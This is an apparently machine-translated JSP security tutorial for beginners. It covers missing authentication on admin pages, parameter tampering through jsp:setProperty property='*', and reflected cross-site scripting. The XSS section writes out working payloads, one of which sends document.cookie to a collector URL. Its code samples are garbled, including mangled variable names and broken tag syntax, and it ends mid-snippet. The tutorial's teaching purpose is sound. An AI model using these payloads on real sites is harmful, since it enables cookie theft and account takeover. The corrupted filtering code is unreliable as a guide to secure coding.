Introduction to security programming examples in JSP tutorials

Java Server PageJSP) is becoming increasingly popular as a technology to build dynamic web pages. In this JSP tutorial, we will talk about the security programming of JSP instances.

JSP is not the same as ASP, PHP, and working mechanism. Generally, JSP pages are compiled rather than interpreted during execution. Calling the JSP file for the first time is actually a process of compiling Servlet. When the browser requests this JSP file from the server, the server will check whether the JSP file has changed since the previous compilation. If the JSP file has not changed, the server will directly execute the Servlet without re-compiling, in this way, the efficiency is significantly improved.

Today, I will work with you to look at JSP security from the perspective of Script Programming. security risks such as source code exposure are not covered in this article. The main purpose of this article is to remind beginners of JSP programming. From the very beginning, we should cultivate the awareness of security programming and avoid mistakes that should not be made to avoid possible losses.

1. for entry-level JSP learners, lax authentication is a low-level mistake

For example, security programming used in Forum instances

User_manager.jsp is a user-managed page. The author knows its sensitivity and adds a lock:

 
 

  
  
If (session. getValue ("UserName") = null) │ (session. getValue ("UserClass") = null) │
(! Session. getValue ("UserClass"). equals ("System Administrator ")))
  
  
{
  
  
Response. sendRedirect ("err. jsp?Id=14");
  
  
Return;
  
  
}
  
  
 
 
 

To view and modify the information of a user, use the modifyuser_manager.jsp file. Submitted by Administrator

Http: // localhost/yyforum/modifyuser_manager.jsp? Modifyid = 51

Is to view, modify the user ID to 51, the Data Administrator Default User ID is 51 ). However, such an important file lacks authentication, and common users, including tourists, can directly submit the above request to view the entire password, which is also stored and displayed in plaintext ). Modifyuser_manage.jsp is also a portal wide-open page. It will not be visible until a malicious user completes the data update operation and redirects it to user_manager.jsp. Obviously, it is far from enough to lock only one door. During programming, you must add authentication to each place that requires identity authentication.

2. ensure the entry of JavaBean in security programming

The core of JSP component technology is bean java components. In a program, logical control and database operations can be placed in the javabeans component, and then called in the JSP file. This increases the definition of the program and the reusability of the program. Compared with the traditional ASP or PHP pages, JSP pages are very simple, because many dynamic page processing processes can be encapsulated into javajan.

To change the JavaBean attribute, use the "<jsp: setProperty>" tag.

The following code is part of the source code of a hypothetical e-shopping system. This file is used to display information in the user's shopping box, while checkout. jsp is used for checkout.

 
 

  
  
﹤jsp:useBean id="myBasket" class="BasketBean"﹥   
  
  
﹤jsp:setProperty name="myBasket" property="*"/﹥   
  
  
﹤jsp:useBean﹥   
  
  
﹤html﹥   
  
  
﹤head﹥﹤title﹥Your Basket﹤/title﹥﹤/head﹥   
  
  
﹤body﹥   
  
  
﹤p﹥   
  
  
You have added the item   
  
  
﹤jsp::getProperty name="myBasket" property="newItem"/﹥   
  
  
to your basket.   
  
  
﹤br/﹥   
  
  
Your total is $   
  
  
﹤jsp::getProperty name="myBasket" property="balance"/﹥   
  
  
Proceed to ﹤a href="checkout.jsp"﹥checkout﹤/a﹥   
  
  
 
 
 

Have you noticed property =? This indicates that the values of all the variables entered on the visible JSP page or submitted directly through the Query String are stored in the matching bean attribute.

Generally, the user submits the request as follows:

A http://www.somesite.com/addToBasket. jsp? NewItem = ITEM0105342

But what about unruly users? They may submit:

Http: // localhost/addToBasket. jsp? NewItem = ITEM0105342 & balance = 0

In this way, the balance = 0 information is stored in the JavaBean. When they click "chekout" to settle the bill, the fee is free.

This is similar to the security problems caused by global variables in PHP. It can be seen that "property =" * "must be used with caution!

Iii. Ever-increasing Cross-Site Scripting

Cross-Site Scripting (XSS) attacks refer to the process of manually inserting malicious JavaScript, VBScript, ActiveX, HTML, or Flash scripts in the HTML code of remote web pages, steal the privacy of users browsing this page, change user settings, and corrupt user data. In most cases, XSS attacks do not affect the running of servers and WEB programs, but they pose a serious threat to the security of clients.

Here is a simple example of a forum. When we submit

Http: // localhost/acjspbbs/dispuser. jsp? Name = someuser <; script> alert (document. cookie) </script>

The dialog box containing your cookie information is displayed. And submit

Http: // localhost/acjspbbs/dispuser. jsp? Name = someuser <; script> document. location = 'HTTP: // www.163.com '</script>

You can redirect To Netease.

When the value of the "name" variable is returned to the client, the script does not encode or filter malicious code. When a user accesses a link embedded with the malicious "name" variable, this will cause the script code to be executed on the user's browser, and may cause user privacy leaks and other consequences. For example, the following link:

Http: // localhost/acjspbbs/dispuser. jsp? Name = someuser <; script> document. location = 'HTTP: // localhost/xxx. xxx? '+ Document. cookie </script>

Xxx. xxx is used to collect the following parameters. Here, the parameter specifies document. cookie, that is, the user's cookie accessing this link. In the ASP world, many people have perfected cookie Stealing technology. Reading cookies in JSP is not difficult. Of course, cross-site scripting is never limited to the cookie Stealing function. I believe everyone will understand it and I will not start it here.

The input and output of all dynamic pages should be encoded to avoid cross-site scripting attacks to a large extent. Unfortunately, all untrusted data encoding is resource-intensive and may affect the performance of Web servers. The common method is to filter input data. For example, the following code replaces dangerous characters:

 
 

  
  
﹤% String message = request.getParameter("message");   
  
  
messagemessage = message.replace ('﹤','_');   
  
  
messagemessage = message.replace ('﹥','_');   
  
  
messagemessage = message.replace ('"','_');   
  
  
messagemessage = message.replace ('\'','_');   
  
  
messagemessage = message.replace ('%','_');   [